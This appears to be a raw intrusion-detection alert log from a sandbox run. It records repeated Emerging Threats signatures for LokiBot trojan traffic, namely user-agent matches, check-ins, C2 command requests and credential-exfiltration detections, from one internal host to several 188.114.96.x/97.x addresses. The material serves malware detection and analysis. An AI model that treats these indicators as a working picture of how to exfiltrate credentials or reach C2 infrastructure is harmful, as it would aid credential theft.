                      05/23/24-20:18:49.167216TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923080192.168.2.22188.114.96.3
                      05/23/24-20:18:48.359257TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922980192.168.2.22188.114.96.9
                      05/23/24-20:18:53.400223TCP2825766ETPRO TROJAN LokiBot Checkin M24923480192.168.2.22188.114.96.3
                      05/23/24-20:17:56.049434TCP2025381ET TROJAN LokiBot Checkin4918280192.168.2.22188.114.96.3
                      05/23/24-20:18:00.736741TCP2025381ET TROJAN LokiBot Checkin4918780192.168.2.22188.114.96.3
                      05/23/24-20:18:59.521470TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924180192.168.2.22188.114.97.3
                      05/23/24-20:19:03.316993TCP2825766ETPRO TROJAN LokiBot Checkin M24924580192.168.2.22188.114.97.3
                      05/23/24-20:18:03.278750TCP2025381ET TROJAN LokiBot Checkin4919080192.168.2.22188.114.96.3
                      05/23/24-20:17:43.183162TCP2025381ET TROJAN LokiBot Checkin4917080192.168.2.22188.114.97.9
                      05/23/24-20:17:36.624490TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14916580192.168.2.22188.114.96.9
                      05/23/24-20:18:17.156368TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920080192.168.2.22188.114.96.3
                      05/23/24-20:18:17.156368TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920080192.168.2.22188.114.96.3
                      05/23/24-20:18:56.093323TCP2825766ETPRO TROJAN LokiBot Checkin M24923780192.168.2.22188.114.97.3
                      05/23/24-20:18:18.976087TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920280192.168.2.22188.114.96.9
                      05/23/24-20:17:42.120355TCP2825766ETPRO TROJAN LokiBot Checkin M24916980192.168.2.22188.114.96.3
                      05/23/24-20:18:18.976087TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920280192.168.2.22188.114.96.9
                      05/23/24-20:19:15.184596TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925880192.168.2.22188.114.96.3
                      05/23/24-20:18:11.714251TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919880192.168.2.22188.114.96.3
                      05/23/24-20:19:15.184596TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925880192.168.2.22188.114.96.3
                      05/23/24-20:18:22.772748TCP2825766ETPRO TROJAN LokiBot Checkin M24920680192.168.2.22188.114.96.3
                      05/23/24-20:18:21.836224TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920580192.168.2.22188.114.96.3
                      05/23/24-20:17:36.624490TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24916580192.168.2.22188.114.96.9
                      05/23/24-20:17:44.106859TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917180192.168.2.22188.114.97.3
                      05/23/24-20:18:39.381191TCP2025381ET TROJAN LokiBot Checkin4921980192.168.2.22188.114.97.3
                      05/23/24-20:18:04.176231TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919180192.168.2.22188.114.96.3
                      05/23/24-20:18:09.860809TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919680192.168.2.22188.114.97.3
                      05/23/24-20:18:01.557933TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918880192.168.2.22188.114.96.3
                      05/23/24-20:18:52.425128TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923380192.168.2.22188.114.97.3
                      05/23/24-20:18:24.566045TCP2025381ET TROJAN LokiBot Checkin4920880192.168.2.22188.114.96.3
                      05/23/24-20:18:01.557933TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918880192.168.2.22188.114.96.3
                      05/23/24-20:19:16.882044TCP2025381ET TROJAN LokiBot Checkin4926080192.168.2.22188.114.96.3
                      05/23/24-20:17:57.920775TCP2825766ETPRO TROJAN LokiBot Checkin M24918480192.168.2.22188.114.96.3
                      05/23/24-20:17:46.332436TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917380192.168.2.22188.114.96.3
                      05/23/24-20:19:05.135747TCP2825766ETPRO TROJAN LokiBot Checkin M24924780192.168.2.22188.114.97.9
                      05/23/24-20:18:04.176231TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919180192.168.2.22188.114.96.3
                      05/23/24-20:18:45.625277TCP2825766ETPRO TROJAN LokiBot Checkin M24922680192.168.2.22188.114.96.3
                      05/23/24-20:18:02.368807TCP2825766ETPRO TROJAN LokiBot Checkin M24918980192.168.2.22188.114.96.3
                      05/23/24-20:18:38.560340TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921880192.168.2.22188.114.97.9
                      05/23/24-20:17:40.814233TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4916880192.168.2.22188.114.97.3
                      05/23/24-20:18:26.597772TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921080192.168.2.22188.114.96.9
                      05/23/24-20:18:38.560340TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921880192.168.2.22188.114.97.9
                      05/23/24-20:17:51.806006TCP2025381ET TROJAN LokiBot Checkin4917980192.168.2.22188.114.96.3
                      05/23/24-20:17:50.944456TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917880192.168.2.22188.114.96.3
                      05/23/24-20:18:10.679781TCP2825766ETPRO TROJAN LokiBot Checkin M24919780192.168.2.22188.114.96.3
                      05/23/24-20:19:14.278026TCP2025381ET TROJAN LokiBot Checkin4925780192.168.2.22188.114.96.3
                      05/23/24-20:18:23.674890TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920780192.168.2.22188.114.96.3
                      05/23/24-20:18:26.597772TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921080192.168.2.22188.114.96.9
                      05/23/24-20:19:01.377448TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924380192.168.2.22188.114.96.3
                      05/23/24-20:19:17.653379TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926180192.168.2.22188.114.96.3
                      05/23/24-20:19:17.653379TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926180192.168.2.22188.114.96.3
                      05/23/24-20:17:39.511374TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14916780192.168.2.22188.114.97.3
                      05/23/24-20:17:49.147570TCP2825766ETPRO TROJAN LokiBot Checkin M24917680192.168.2.22188.114.96.3
                      05/23/24-20:19:02.183841TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924480192.168.2.22188.114.96.9
                      05/23/24-20:19:13.398917TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925680192.168.2.22188.114.97.3
                      05/23/24-20:19:16.005968TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925980192.168.2.22188.114.97.3
                      05/23/24-20:19:10.741295TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925380192.168.2.22188.114.97.3
                      05/23/24-20:18:40.275029TCP2025381ET TROJAN LokiBot Checkin4922080192.168.2.22188.114.97.9
                      05/23/24-20:19:08.863871TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925180192.168.2.22188.114.96.3
                      05/23/24-20:18:57.792134TCP2025381ET TROJAN LokiBot Checkin4923980192.168.2.22188.114.97.3
                      05/23/24-20:18:37.677256TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921780192.168.2.22188.114.96.3
                      05/23/24-20:19:13.398917TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925680192.168.2.22188.114.97.3
                      05/23/24-20:17:35.132025TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4916480192.168.2.22188.114.97.3
                      05/23/24-20:17:39.511374TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24916780192.168.2.22188.114.97.3
                      05/23/24-20:18:30.098368TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921480192.168.2.22188.114.96.9
                      05/23/24-20:18:43.784658TCP2825766ETPRO TROJAN LokiBot Checkin M24922480192.168.2.22188.114.97.3
                      05/23/24-20:19:00.429820TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924280192.168.2.22188.114.96.3
                      05/23/24-20:18:42.915752TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922380192.168.2.22188.114.97.3
                      05/23/24-20:18:30.098368TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921480192.168.2.22188.114.96.9
                      05/23/24-20:18:42.915752TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922380192.168.2.22188.114.97.3
                      05/23/24-20:18:19.988815TCP2025381ET TROJAN LokiBot Checkin4920380192.168.2.22188.114.96.3
                      05/23/24-20:18:44.730541TCP2825766ETPRO TROJAN LokiBot Checkin M24922580192.168.2.22188.114.97.3
                      05/23/24-20:17:54.073092TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918180192.168.2.22188.114.96.3
                      05/23/24-20:18:16.270962TCP2025381ET TROJAN LokiBot Checkin4919980192.168.2.22188.114.96.3
                      05/23/24-20:17:52.694696TCP2025381ET TROJAN LokiBot Checkin4918080192.168.2.22188.114.97.3
                      05/23/24-20:18:56.093323TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923780192.168.2.22188.114.97.3
                      05/23/24-20:17:56.984952TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918380192.168.2.22188.114.97.3
                      05/23/24-20:17:42.120355TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4916980192.168.2.22188.114.96.3
                      05/23/24-20:18:56.093323TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923780192.168.2.22188.114.97.3
                      05/23/24-20:19:02.183841TCP2825766ETPRO TROJAN LokiBot Checkin M24924480192.168.2.22188.114.96.9
                      05/23/24-20:18:09.860809TCP2825766ETPRO TROJAN LokiBot Checkin M24919680192.168.2.22188.114.97.3
                      05/23/24-20:18:44.730541TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922580192.168.2.22188.114.97.3
                      05/23/24-20:18:37.677256TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921780192.168.2.22188.114.96.3
                      05/23/24-20:18:50.061779TCP2025381ET TROJAN LokiBot Checkin4923180192.168.2.22188.114.96.3
                      05/23/24-20:18:07.989686TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919480192.168.2.22188.114.96.3
                      05/23/24-20:18:28.376454TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921280192.168.2.22188.114.96.9
                      05/23/24-20:18:43.784658TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922480192.168.2.22188.114.97.3
                      05/23/24-20:18:49.167216TCP2825766ETPRO TROJAN LokiBot Checkin M24923080192.168.2.22188.114.96.3
                      05/23/24-20:19:00.429820TCP2825766ETPRO TROJAN LokiBot Checkin M24924280192.168.2.22188.114.96.3
                      05/23/24-20:18:10.679781TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919780192.168.2.22188.114.96.3
                      05/23/24-20:18:08.948107TCP2025381ET TROJAN LokiBot Checkin4919580192.168.2.22188.114.96.3
                      05/23/24-20:18:29.294238TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921380192.168.2.22188.114.96.3
                      05/23/24-20:18:29.294238TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921380192.168.2.22188.114.96.3
                      05/23/24-20:18:41.210686TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922180192.168.2.22188.114.97.3
                      05/23/24-20:18:10.679781TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919780192.168.2.22188.114.96.3
                      05/23/24-20:18:43.784658TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922480192.168.2.22188.114.97.3
                      05/23/24-20:17:38.077506TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24916680192.168.2.22188.114.97.3
                      05/23/24-20:17:39.511374TCP2825766ETPRO TROJAN LokiBot Checkin M24916780192.168.2.22188.114.97.3
                      05/23/24-20:17:56.984952TCP2825766ETPRO TROJAN LokiBot Checkin M24918380192.168.2.22188.114.97.3
                      05/23/24-20:17:58.820260TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918580192.168.2.22188.114.96.3
                      05/23/24-20:19:17.653379TCP2825766ETPRO TROJAN LokiBot Checkin M24926180192.168.2.22188.114.96.3
                      05/23/24-20:17:45.155201TCP2825766ETPRO TROJAN LokiBot Checkin M24917280192.168.2.22188.114.96.3
                      05/23/24-20:17:38.077506TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14916680192.168.2.22188.114.97.3
                      05/23/24-20:18:21.836224TCP2825766ETPRO TROJAN LokiBot Checkin M24920580192.168.2.22188.114.96.3
                      05/23/24-20:17:57.920775TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918480192.168.2.22188.114.96.3
                      05/23/24-20:19:12.597934TCP2825766ETPRO TROJAN LokiBot Checkin M24925580192.168.2.22188.114.96.3
                      05/23/24-20:18:27.512891TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921180192.168.2.22188.114.97.3
                      05/23/24-20:17:45.155201TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917280192.168.2.22188.114.96.3
                      05/23/24-20:17:57.920775TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918480192.168.2.22188.114.96.3
                      05/23/24-20:18:58.594043TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924080192.168.2.22188.114.96.9
                      05/23/24-20:18:06.045591TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919280192.168.2.22188.114.97.3
                      05/23/24-20:18:27.512891TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921180192.168.2.22188.114.97.3
                      05/23/24-20:18:54.312724TCP2025381ET TROJAN LokiBot Checkin4923580192.168.2.22188.114.97.3
                      05/23/24-20:18:45.625277TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922680192.168.2.22188.114.96.3
                      05/23/24-20:18:47.441038TCP2025381ET TROJAN LokiBot Checkin4922880192.168.2.22188.114.96.3
                      05/23/24-20:19:11.675767TCP2025381ET TROJAN LokiBot Checkin4925480192.168.2.22188.114.96.9
                      05/23/24-20:18:25.484710TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920980192.168.2.22188.114.97.3
                      05/23/24-20:19:12.597934TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925580192.168.2.22188.114.96.3
                      05/23/24-20:19:10.741295TCP2825766ETPRO TROJAN LokiBot Checkin M24925380192.168.2.22188.114.97.3
                      05/23/24-20:18:46.517579TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922780192.168.2.22188.114.96.9
                      05/23/24-20:18:45.625277TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922680192.168.2.22188.114.96.3
                      05/23/24-20:17:58.820260TCP2825766ETPRO TROJAN LokiBot Checkin M24918580192.168.2.22188.114.96.3
                      05/23/24-20:19:05.135747TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924780192.168.2.22188.114.97.9
                      05/23/24-20:18:46.517579TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922780192.168.2.22188.114.96.9
                      05/23/24-20:18:04.176231TCP2825766ETPRO TROJAN LokiBot Checkin M24919180192.168.2.22188.114.96.3
                      05/23/24-20:19:05.135747TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924780192.168.2.22188.114.97.9
                      05/23/24-20:19:10.741295TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925380192.168.2.22188.114.97.3
                      05/23/24-20:19:02.183841TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924480192.168.2.22188.114.96.9
                      05/23/24-20:17:39.511374TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4916780192.168.2.22188.114.97.3
                      05/23/24-20:18:24.566045TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920880192.168.2.22188.114.96.3
                      05/23/24-20:19:02.183841TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924480192.168.2.22188.114.96.9
                      05/23/24-20:19:01.377448TCP2025381ET TROJAN LokiBot Checkin4924380192.168.2.22188.114.96.3
                      05/23/24-20:19:14.278026TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925780192.168.2.22188.114.96.3
                      05/23/24-20:19:10.741295TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925380192.168.2.22188.114.97.3
                      05/23/24-20:19:17.653379TCP2025381ET TROJAN LokiBot Checkin4926180192.168.2.22188.114.96.3
                      05/23/24-20:18:23.674890TCP2825766ETPRO TROJAN LokiBot Checkin M24920780192.168.2.22188.114.96.3
                      05/23/24-20:18:39.381191TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921980192.168.2.22188.114.97.3
                      05/23/24-20:19:14.278026TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925780192.168.2.22188.114.96.3
                      05/23/24-20:17:50.944456TCP2025381ET TROJAN LokiBot Checkin4917880192.168.2.22188.114.96.3
                      05/23/24-20:19:00.429820TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924280192.168.2.22188.114.96.3
                      05/23/24-20:18:17.156368TCP2025381ET TROJAN LokiBot Checkin4920080192.168.2.22188.114.96.3
                      05/23/24-20:18:41.981231TCP2825766ETPRO TROJAN LokiBot Checkin M24922280192.168.2.22188.114.96.9
                      05/23/24-20:18:54.312724TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923580192.168.2.22188.114.97.3
                      05/23/24-20:18:18.976087TCP2025381ET TROJAN LokiBot Checkin4920280192.168.2.22188.114.96.9
                      05/23/24-20:18:46.517579TCP2825766ETPRO TROJAN LokiBot Checkin M24922780192.168.2.22188.114.96.9
                      05/23/24-20:19:01.377448TCP2825766ETPRO TROJAN LokiBot Checkin M24924380192.168.2.22188.114.96.3
                      05/23/24-20:18:27.512891TCP2025381ET TROJAN LokiBot Checkin4921180192.168.2.22188.114.97.3
                      05/23/24-20:18:54.312724TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923580192.168.2.22188.114.97.3
                      05/23/24-20:19:00.429820TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924280192.168.2.22188.114.96.3
                      05/23/24-20:17:38.077506TCP2025381ET TROJAN LokiBot Checkin4916680192.168.2.22188.114.97.3
                      05/23/24-20:19:11.675767TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925480192.168.2.22188.114.96.9
                      05/23/24-20:18:58.594043TCP2025381ET TROJAN LokiBot Checkin4924080192.168.2.22188.114.96.9
                      05/23/24-20:19:15.184596TCP2825766ETPRO TROJAN LokiBot Checkin M24925880192.168.2.22188.114.96.3
                      05/23/24-20:18:22.772748TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920680192.168.2.22188.114.96.3
                      05/23/24-20:18:11.714251TCP2825766ETPRO TROJAN LokiBot Checkin M24919880192.168.2.22188.114.96.3
                      05/23/24-20:17:42.120355TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24916980192.168.2.22188.114.96.3
                      05/23/24-20:18:37.677256TCP2825766ETPRO TROJAN LokiBot Checkin M24921780192.168.2.22188.114.96.3
                      05/23/24-20:17:42.120355TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14916980192.168.2.22188.114.96.3
                      05/23/24-20:18:41.210686TCP2025381ET TROJAN LokiBot Checkin4922180192.168.2.22188.114.97.3
                      05/23/24-20:18:41.981231TCP2025381ET TROJAN LokiBot Checkin4922280192.168.2.22188.114.96.9
                      05/23/24-20:18:44.730541TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922580192.168.2.22188.114.97.3
                      05/23/24-20:18:01.557933TCP2025381ET TROJAN LokiBot Checkin4918880192.168.2.22188.114.96.3
                      05/23/24-20:19:09.943896TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925280192.168.2.22188.114.96.3
                      05/23/24-20:18:44.730541TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922580192.168.2.22188.114.97.3
                      05/23/24-20:18:55.233506TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923680192.168.2.22188.114.96.9
                      05/23/24-20:19:11.675767TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925480192.168.2.22188.114.96.9
                      05/23/24-20:18:55.233506TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923680192.168.2.22188.114.96.9
                      05/23/24-20:19:09.943896TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925280192.168.2.22188.114.96.3
                      05/23/24-20:18:10.679781TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919780192.168.2.22188.114.96.3
                      05/23/24-20:18:07.107766TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919380192.168.2.22188.114.97.3
                      05/23/24-20:18:30.957362TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921580192.168.2.22188.114.97.3
                      05/23/24-20:18:21.836224TCP2025381ET TROJAN LokiBot Checkin4920580192.168.2.22188.114.96.3
                      05/23/24-20:18:30.957362TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921580192.168.2.22188.114.97.3
                      05/23/24-20:19:06.064261TCP2825766ETPRO TROJAN LokiBot Checkin M24924880192.168.2.22188.114.96.3
                      05/23/24-20:18:11.714251TCP2025381ET TROJAN LokiBot Checkin4919880192.168.2.22188.114.96.3
                      05/23/24-20:17:51.806006TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917980192.168.2.22188.114.96.3
                      05/23/24-20:17:54.073092TCP2825766ETPRO TROJAN LokiBot Checkin M24918180192.168.2.22188.114.96.3
                      05/23/24-20:19:16.005968TCP2825766ETPRO TROJAN LokiBot Checkin M24925980192.168.2.22188.114.97.3
                      05/23/24-20:17:56.049434TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918280192.168.2.22188.114.96.3
                      05/23/24-20:18:22.772748TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920680192.168.2.22188.114.96.3
                      05/23/24-20:17:51.806006TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917980192.168.2.22188.114.96.3
                      05/23/24-20:17:50.058542TCP2025381ET TROJAN LokiBot Checkin4917780192.168.2.22188.114.96.9
                      05/23/24-20:17:52.694696TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918080192.168.2.22188.114.97.3
                      05/23/24-20:18:31.712532TCP2825766ETPRO TROJAN LokiBot Checkin M24921680192.168.2.22188.114.97.3
                      05/23/24-20:17:40.814233TCP2825766ETPRO TROJAN LokiBot Checkin M24916880192.168.2.22188.114.97.3
                      05/23/24-20:18:40.275029TCP2825766ETPRO TROJAN LokiBot Checkin M24922080192.168.2.22188.114.97.9
                      05/23/24-20:17:57.920775TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918480192.168.2.22188.114.96.3
                      05/23/24-20:19:12.597934TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925580192.168.2.22188.114.96.3
                      05/23/24-20:19:03.316993TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924580192.168.2.22188.114.97.3
                      05/23/24-20:18:28.376454TCP2025381ET TROJAN LokiBot Checkin4921280192.168.2.22188.114.96.9
                      05/23/24-20:18:31.712532TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921680192.168.2.22188.114.97.3
                      05/23/24-20:18:18.079750TCP2025381ET TROJAN LokiBot Checkin4920180192.168.2.22188.114.97.3
                      05/23/24-20:19:12.597934TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925580192.168.2.22188.114.96.3
                      05/23/24-20:18:59.521470TCP2825766ETPRO TROJAN LokiBot Checkin M24924180192.168.2.22188.114.97.3
                      05/23/24-20:19:03.316993TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924580192.168.2.22188.114.97.3
                      05/23/24-20:19:16.882044TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926080192.168.2.22188.114.96.3
                      05/23/24-20:19:06.064261TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924880192.168.2.22188.114.96.3
                      05/23/24-20:19:07.888746TCP2825766ETPRO TROJAN LokiBot Checkin M24925080192.168.2.22188.114.96.3
                      05/23/24-20:18:48.359257TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922980192.168.2.22188.114.96.9
                      05/23/24-20:18:51.088057TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923280192.168.2.22188.114.97.3
                      05/23/24-20:18:56.909324TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923880192.168.2.22188.114.97.3
                      05/23/24-20:18:52.425128TCP2825766ETPRO TROJAN LokiBot Checkin M24923380192.168.2.22188.114.97.3
                      05/23/24-20:18:16.270962TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919980192.168.2.22188.114.96.3
                      05/23/24-20:18:56.909324TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923880192.168.2.22188.114.97.3
                      05/23/24-20:18:16.270962TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919980192.168.2.22188.114.96.3
                      05/23/24-20:18:48.359257TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922980192.168.2.22188.114.96.9
                      05/23/24-20:17:59.837093TCP2025381ET TROJAN LokiBot Checkin4918680192.168.2.22188.114.97.3
                      05/23/24-20:18:57.792134TCP2825766ETPRO TROJAN LokiBot Checkin M24923980192.168.2.22188.114.97.3
                      05/23/24-20:18:47.441038TCP2825766ETPRO TROJAN LokiBot Checkin M24922880192.168.2.22188.114.96.3
                      05/23/24-20:18:51.088057TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923280192.168.2.22188.114.97.3
                      05/23/24-20:17:44.106859TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917180192.168.2.22188.114.97.3
                      05/23/24-20:18:00.736741TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918780192.168.2.22188.114.96.3
                      05/23/24-20:18:29.294238TCP2025381ET TROJAN LokiBot Checkin4921380192.168.2.22188.114.96.3
                      05/23/24-20:19:16.882044TCP2825766ETPRO TROJAN LokiBot Checkin M24926080192.168.2.22188.114.96.3
                      05/23/24-20:17:44.106859TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917180192.168.2.22188.114.97.3
                      05/23/24-20:18:47.441038TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922880192.168.2.22188.114.96.3
                      05/23/24-20:18:53.400223TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923480192.168.2.22188.114.96.3
                      05/23/24-20:18:30.098368TCP2825766ETPRO TROJAN LokiBot Checkin M24921480192.168.2.22188.114.96.9
                      05/23/24-20:18:45.625277TCP2025381ET TROJAN LokiBot Checkin4922680192.168.2.22188.114.96.3
                      05/23/24-20:18:53.400223TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923480192.168.2.22188.114.96.3
                      05/23/24-20:17:49.147570TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917680192.168.2.22188.114.96.3
                      05/23/24-20:19:18.441021TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926280192.168.2.22188.114.96.3
                      05/23/24-20:17:46.332436TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917380192.168.2.22188.114.96.3
                      05/23/24-20:17:46.332436TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917380192.168.2.22188.114.96.3
                      05/23/24-20:19:18.441021TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926280192.168.2.22188.114.96.3
                      05/23/24-20:17:48.088333TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917580192.168.2.22188.114.97.3
                      05/23/24-20:17:49.147570TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917680192.168.2.22188.114.96.3
                      05/23/24-20:18:56.093323TCP2025381ET TROJAN LokiBot Checkin4923780192.168.2.22188.114.97.3
                      05/23/24-20:18:20.882874TCP2825766ETPRO TROJAN LokiBot Checkin M24920480192.168.2.22188.114.96.9
                      05/23/24-20:19:04.226888TCP2025381ET TROJAN LokiBot Checkin4924680192.168.2.22188.114.96.9
                      05/23/24-20:17:47.208604TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917480192.168.2.22188.114.97.3
                      05/23/24-20:17:47.208604TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917480192.168.2.22188.114.97.3
                      05/23/24-20:18:38.560340TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921880192.168.2.22188.114.97.9
                      05/23/24-20:18:38.560340TCP2825766ETPRO TROJAN LokiBot Checkin M24921880192.168.2.22188.114.97.9
                      05/23/24-20:19:08.863871TCP2025381ET TROJAN LokiBot Checkin4925180192.168.2.22188.114.96.3
                      05/23/24-20:19:07.888746TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925080192.168.2.22188.114.96.3
                      05/23/24-20:18:20.882874TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920480192.168.2.22188.114.96.9
                      05/23/24-20:18:43.784658TCP2025381ET TROJAN LokiBot Checkin4922480192.168.2.22188.114.97.3
                      05/23/24-20:18:02.368807TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918980192.168.2.22188.114.96.3
